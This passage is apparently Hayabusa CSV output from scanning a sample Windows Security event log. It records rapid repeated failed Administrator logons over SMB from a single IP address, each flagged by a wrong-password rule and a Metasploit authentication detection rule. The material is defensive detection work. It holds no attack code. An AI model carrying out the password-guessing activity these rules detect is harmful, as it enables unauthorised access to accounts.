Password,User: Administrator : Type: 3 : Workstation: G0E44RVqAE1feU0b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ny5LCb1qOIUhxOPY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9jcDgzzqH26DjQ1k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yil94cFkU6UP24SK : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bkdVHF3vggCcuNdn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4dRRI2CS3aVIX4nX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: chDZq3VgxIE2mRb9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.046 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HLVvgMmqLXKZADON : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.046 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i4avO2AJSlNb0IUL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mdo5CvycGvGhn33y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: heJfjLl1vbX6lMjZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.171 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wOP1E6hd4Jtj4gob : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xa7kMCNz0bEGTBqX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HSxTQ4HsZt2DeYVe : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.293 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YxHpSQwFSV4hveVM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.341 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n3OwzSPomxZLoCe6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e9IfwDZIfYT6A50K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.463 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOf6DbRX4zlNqLdb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.463 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 00kXrnJNH40NyoYL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nsNHcb9pnpdRgeL7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ucMhgxMXy9Ch1jNm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cfi3ZaLTECJgjM9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: usugjEEBHlhJvOyu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WQ1pM2CVLt5ITVD5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.746 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NIboW7hNljF3HPpk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.746 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rOk5W4rkSYRRw4xS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.795 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AJTfcwd8rnFc06iF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.858 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.930 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6sm415W5zkvjdnTV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.930 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KEiSbtlmW4ou1mc7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xWeZV5pHt94adwUy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 5np7HeCPAFTDdTXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gXbe2jEJVtwaQXlr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7hZFiUCJnaBdHcw4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.134 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a71wyo41KV1ZoT7p : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.176 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogB17WdeOiC19rqn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.286 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ANOLPWG12lkW39Ei : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.286 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y1vf7OUxb6TH3Q4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.332 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bxU5yumSieUzSgzH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.368 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9K5EoWWASU8SlSe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PwZLRPFxaFWwjZEe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.445 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 8fXgFFb3HTMunsoi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.500 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R1RozAr1uhux4cYW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.586 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n7EmuUSv03RnhKsF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.586 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jw410HEW8EC3MC9f : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UTYp8cEbt3Yggo3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.727 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWJVzgYLWIo7SGCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.727 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DP13jPdW5Gdl8z56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
